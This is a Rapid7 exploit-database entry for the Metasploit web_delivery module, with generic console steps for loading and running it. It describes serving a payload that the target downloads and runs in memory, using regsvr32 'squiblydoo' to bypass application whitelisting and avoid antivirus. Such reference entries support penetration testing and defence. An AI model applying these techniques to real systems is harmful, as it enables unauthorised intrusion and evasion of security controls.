Rapid7 Vulnerability & Exploit Database

Script Web Delivery

Back to Search

Script Web Delivery

Disclosed
07/19/2013
Created
05/30/2018

Description

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

Author(s)

  • Andrew Smith "jakx" <jakx.ppr@gmail.com>
  • Ben Campbell <eat_meatballs@hotmail.co.uk>
  • Chris Campbell
  • Casey Smith
  • Trenton Ivey
  • g0tmi1k

Platform

PHP,Python,Windows

Development

References

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
    ...targets...
msf exploit(web_delivery) > set TARGET < target-id >
msf exploit(web_delivery) > show options
    ...show and set options...
msf exploit(web_delivery) > exploit

Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.

– Jim O’Gorman | President, Offensive Security

;